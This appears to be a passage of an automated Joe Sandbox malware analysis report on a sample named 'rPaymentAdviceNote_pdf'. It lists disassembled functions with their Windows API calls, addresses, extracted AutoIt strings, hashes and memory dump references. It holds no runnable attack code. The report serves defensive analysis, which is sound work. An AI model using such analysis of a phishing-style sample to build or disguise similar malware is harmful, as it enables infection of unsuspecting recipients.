                                                              Download Yara Rule
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 008CA630
                                                              • GetSysColorBrush.USER32(0000000F), ref: 008CA661
                                                              • GetSysColor.USER32(0000000F), ref: 008CA66D
                                                              • SetBkColor.GDI32(?,000000FF), ref: 008CA687
                                                              • SelectObject.GDI32(?,00000000), ref: 008CA696
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 008CA6C1
                                                              • GetSysColor.USER32(00000010), ref: 008CA6C9
                                                              • CreateSolidBrush.GDI32(00000000), ref: 008CA6D0
                                                              • FrameRect.USER32(?,?,00000000), ref: 008CA6DF
                                                              • DeleteObject.GDI32(00000000), ref: 008CA6E6
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 008CA731
                                                              • FillRect.USER32(?,?,00000000), ref: 008CA763
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CA78E
                                                                • Part of subcall function 008CA8CA: GetSysColor.USER32(00000012), ref: 008CA903
                                                                • Part of subcall function 008CA8CA: SetTextColor.GDI32(?,?), ref: 008CA907
                                                                • Part of subcall function 008CA8CA: GetSysColorBrush.USER32(0000000F), ref: 008CA91D
                                                                • Part of subcall function 008CA8CA: GetSysColor.USER32(0000000F), ref: 008CA928
                                                                • Part of subcall function 008CA8CA: GetSysColor.USER32(00000011), ref: 008CA945
                                                                • Part of subcall function 008CA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008CA953
                                                                • Part of subcall function 008CA8CA: SelectObject.GDI32(?,00000000), ref: 008CA964
                                                                • Part of subcall function 008CA8CA: SetBkColor.GDI32(?,00000000), ref: 008CA96D
                                                                • Part of subcall function 008CA8CA: SelectObject.GDI32(?,?), ref: 008CA97A
                                                                • Part of subcall function 008CA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 008CA999
                                                                • Part of subcall function 008CA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008CA9B0
                                                                • Part of subcall function 008CA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 008CA9C5
                                                                • Part of subcall function 008CA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008CA9ED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 08275021613c7d253f3333863ae4b605ddd1b20179160df4eec61d8e0c2a7bb4
                                                              • Instruction ID: bd5981d0a017bee8daee65bc999b45d1cf4a1b54e7ae46b8fd91aee86bcae5be
                                                              • Opcode Fuzzy Hash: 08275021613c7d253f3333863ae4b605ddd1b20179160df4eec61d8e0c2a7bb4
                                                              • Instruction Fuzzy Hash: 2D915A72008305EFE7119F64DC08E5B7BBAFB88325F144A29FAA2D61A2D771D944CB52
                                                              Function 00842C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?), ref: 00842CA2
                                                              • DeleteObject.GDI32(00000000), ref: 00842CE8
                                                              • DeleteObject.GDI32(00000000), ref: 00842CF3
                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00842CFE
                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00842D09
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0087C43B
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0087C474
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0087C89D
                                                                • Part of subcall function 00841B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00842036,?,00000000,?,?,?,?,008416CB,00000000,?), ref: 00841B9A
                                                              • SendMessageW.USER32(?,00001053), ref: 0087C8DA
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0087C8F1
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0087C907
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0087C912
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              • Opcode ID: ae4e3eb45835bc046d2d10f577cbca281ea59d120c07d79dc341410aa62113a8
                                                              • Instruction ID: c8dfe829311aae3a3468f0c0e0ff560825c9949908c937ccedcb6971c31f1023
                                                              • Opcode Fuzzy Hash: ae4e3eb45835bc046d2d10f577cbca281ea59d120c07d79dc341410aa62113a8
                                                              • Instruction Fuzzy Hash: 91128C30604205EFDB25CF28C884BA9BBE5FF54314F5485ADF999CB266CB31E842DB91
                                                              Function 008B74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 008B74DE
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008B759D
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008B75DB
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008B75ED
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008B7633
                                                              • GetClientRect.USER32(00000000,?), ref: 008B763F
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008B7683
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008B7692
                                                              • GetStockObject.GDI32(00000011), ref: 008B76A2
                                                              • SelectObject.GDI32(00000000,00000000), ref: 008B76A6
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008B76B6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008B76BF
                                                              • DeleteDC.GDI32(00000000), ref: 008B76C8
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008B76F4
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 008B770B
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008B7746
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008B775A
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 008B776B
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008B779B
                                                              • GetStockObject.GDI32(00000011), ref: 008B77A6
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008B77B1
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008B77BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              • API String ID: 2910397461-517079104
                                                              • Opcode ID: e6d012cf3e28f4ade707b49d628b66e96d47b329c915aaa39b951f644c3590c8
                                                              • Instruction ID: b06753630769cd0bceef46c71c2c792c09aafbdd9fdbeb014047256c11055aaa
                                                              • Opcode Fuzzy Hash: e6d012cf3e28f4ade707b49d628b66e96d47b329c915aaa39b951f644c3590c8
                                                              • Instruction Fuzzy Hash: 7DA14F71A50619BFEB249BA8DC4AFAB7BBAFF44710F004115FA15E72E1C670AD00CB64
                                                              Function 008AAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AAD1E
                                                              • GetDriveTypeW.KERNEL32(?,008CFAC0,?,\\.\,008CF910), ref: 008AADFB
                                                              • SetErrorMode.KERNEL32(00000000,008CFAC0,?,\\.\,008CF910), ref: 008AAF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: f98a055412d161d7d7ec4506bb55fde5daa8d1e3bc84670d859fe3971269b5ed
                                                              • Instruction ID: c516e92f1bebeb4a5ddcb57ff78fd0dedf85443880bc05848b0a50f3b62d8c9a
                                                              • Opcode Fuzzy Hash: f98a055412d161d7d7ec4506bb55fde5daa8d1e3bc84670d859fe3971269b5ed
                                                              • Instruction Fuzzy Hash: D7518AB064820DEFAB1CEB24D982CB9B3A1FB0A718B204057E516E6E91DF359D05DB53
                                                              Function 008468DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: c667d9f3ec19f0961e9eb2d44d01e804c03c2c0e7690bb13c1800824a948d44c
                                                              • Instruction ID: 75555a4c9de753fa543adacefc95d2ec926f032e2760a7b0ac71f51551feb171
                                                              • Opcode Fuzzy Hash: c667d9f3ec19f0961e9eb2d44d01e804c03c2c0e7690bb13c1800824a948d44c
                                                              • Instruction Fuzzy Hash: B78117B060061DAADB10AB64EC42FAF3B68FF16714F044025F905EA296FB74DE65C663
                                                              Function 008C9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 008C9AD2
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 008C9B8B
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 008C9BA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: 95cdabbc60382fca7623f3189f1b03f9cbc0e30ba70ffaf16a641316e30545d8
                                                              • Instruction ID: eb8103bad2534bd073a8870b7f535d53d08794dc4156eea37480a72eadf703f2
                                                              • Opcode Fuzzy Hash: 95cdabbc60382fca7623f3189f1b03f9cbc0e30ba70ffaf16a641316e30545d8
                                                              • Instruction Fuzzy Hash: 63029930108205AFEB258F24C849FAABBF5FB59314F0485ADFAD9D62A1CB74D944CB52
                                                              Function 008CA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 008CA903
                                                              • SetTextColor.GDI32(?,?), ref: 008CA907
                                                              • GetSysColorBrush.USER32(0000000F), ref: 008CA91D
                                                              • GetSysColor.USER32(0000000F), ref: 008CA928
                                                              • CreateSolidBrush.GDI32(?), ref: 008CA92D
                                                              • GetSysColor.USER32(00000011), ref: 008CA945
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008CA953
                                                              • SelectObject.GDI32(?,00000000), ref: 008CA964
                                                              • SetBkColor.GDI32(?,00000000), ref: 008CA96D
                                                              • SelectObject.GDI32(?,?), ref: 008CA97A
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 008CA999
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008CA9B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 008CA9C5
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008CA9ED
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008CAA14
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 008CAA32
                                                              • DrawFocusRect.USER32(?,?), ref: 008CAA3D
                                                              • GetSysColor.USER32(00000011), ref: 008CAA4B
                                                              • SetTextColor.GDI32(?,00000000), ref: 008CAA53
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 008CAA67
                                                              • SelectObject.GDI32(?,008CA5FA), ref: 008CAA7E
                                                              • DeleteObject.GDI32(?), ref: 008CAA89
                                                              • SelectObject.GDI32(?,?), ref: 008CAA8F
                                                              • DeleteObject.GDI32(?), ref: 008CAA94
                                                              • SetTextColor.GDI32(?,?), ref: 008CAA9A
                                                              • SetBkColor.GDI32(?,?), ref: 008CAAA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: da1ebc797243395ec44120fbe88437abfdcf0e271b807539a2323a6dac686741
                                                              • Instruction ID: cf01569f50d1706b1d54256220cad93a9635cabfbb1155f44cf22457d1693d90
                                                              • Opcode Fuzzy Hash: da1ebc797243395ec44120fbe88437abfdcf0e271b807539a2323a6dac686741
                                                              • Instruction Fuzzy Hash: 0D512C71900218EFEB119FA4DC49EAE7B7AFB08320F154625FA11AB2A2D7719940DF90
                                                              Function 008C89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008C8AC1
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008C8AD2
                                                              • CharNextW.USER32(0000014E), ref: 008C8B01
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008C8B42
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008C8B58
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008C8B69
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008C8B86
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 008C8BD8
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 008C8BEE
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 008C8C1F
                                                              • _memset.LIBCMT ref: 008C8C44
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008C8C8D
                                                              • _memset.LIBCMT ref: 008C8CEC
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 008C8D16
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 008C8D6E
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 008C8E1B
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 008C8E3D
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008C8E87
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008C8EB4
                                                              • DrawMenuBar.USER32(?), ref: 008C8EC3
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 008C8EEB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: 3cee54d88d26b55d2c3cf18da99a7aae6e440711a411be50df2400ce975b35c4
                                                              • Instruction ID: 34793a561b7a7e390de2219a1ea080b215685d83e49309f9daa2e973b2a9d8d9
                                                              • Opcode Fuzzy Hash: 3cee54d88d26b55d2c3cf18da99a7aae6e440711a411be50df2400ce975b35c4
                                                              • Instruction Fuzzy Hash: 88E13B70940218EEDB219F64DC84FEE7BB9FB05724F10815AFA15EA291DB70DA80DF61
                                                              Function 008C488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 008C49CA
                                                              • GetDesktopWindow.USER32 ref: 008C49DF
                                                              • GetWindowRect.USER32(00000000), ref: 008C49E6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008C4A48
                                                              • DestroyWindow.USER32(?), ref: 008C4A74
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008C4A9D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008C4ABB
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008C4AE1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 008C4AF6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008C4B09
                                                              • IsWindowVisible.USER32(?), ref: 008C4B29
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008C4B44
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 008C4B58
                                                              • GetWindowRect.USER32(?,?), ref: 008C4B70
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 008C4B96
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 008C4BB0
                                                              • CopyRect.USER32(?,?), ref: 008C4BC7
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 008C4C32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: ebcd3ce6433db8b16f1911d9110839203cfe903d7a95180bad369f737cdb8ce0
                                                              • Instruction ID: 506cfe4b8392a787ca9f93ebd9eb0043632c1329f896a43907f145d5663a20ea
                                                              • Opcode Fuzzy Hash: ebcd3ce6433db8b16f1911d9110839203cfe903d7a95180bad369f737cdb8ce0
                                                              • Instruction Fuzzy Hash: 68B18770604350AFDB14DF68C888F6ABBE5FB88314F00891DF999DB2A1D771E845CB96
                                                              Function 008A449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008A44AC
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008A44D2
                                                              • _wcscpy.LIBCMT ref: 008A4500
                                                              • _wcscmp.LIBCMT ref: 008A450B
                                                              • _wcscat.LIBCMT ref: 008A4521
                                                              • _wcsstr.LIBCMT ref: 008A452C
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008A4548
                                                              • _wcscat.LIBCMT ref: 008A4591
                                                              • _wcscat.LIBCMT ref: 008A4598
                                                              • _wcsncpy.LIBCMT ref: 008A45C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: e08faf38631db58cbb90cb62c04f1d3ffb6a7edd818ef7da6c7fbb3fad437d0d
                                                              • Instruction ID: ac188dd1999aa7eae819bef56107deef94e5e0166bb789dbe93ec91ee9e433c2
                                                              • Opcode Fuzzy Hash: e08faf38631db58cbb90cb62c04f1d3ffb6a7edd818ef7da6c7fbb3fad437d0d
                                                              • Instruction Fuzzy Hash: 3641D971A002147BEB11AB788C47EBF777CFF52710F04056AFA05E6183EB79D90196AA
                                                              Function 008427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008428BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 008428C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008428EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 008428F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 0084291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00842939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00842949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0084297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00842990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 008429AE
                                                              • GetStockObject.GDI32(00000011), ref: 008429CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008429D5
                                                                • Part of subcall function 00842344: GetCursorPos.USER32(?), ref: 00842357
                                                                • Part of subcall function 00842344: ScreenToClient.USER32(009057B0,?), ref: 00842374
                                                                • Part of subcall function 00842344: GetAsyncKeyState.USER32(00000001), ref: 00842399
                                                                • Part of subcall function 00842344: GetAsyncKeyState.USER32(00000002), ref: 008423A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00841256), ref: 008429FC
                                                              Strings
                                                              Memory Dump Source
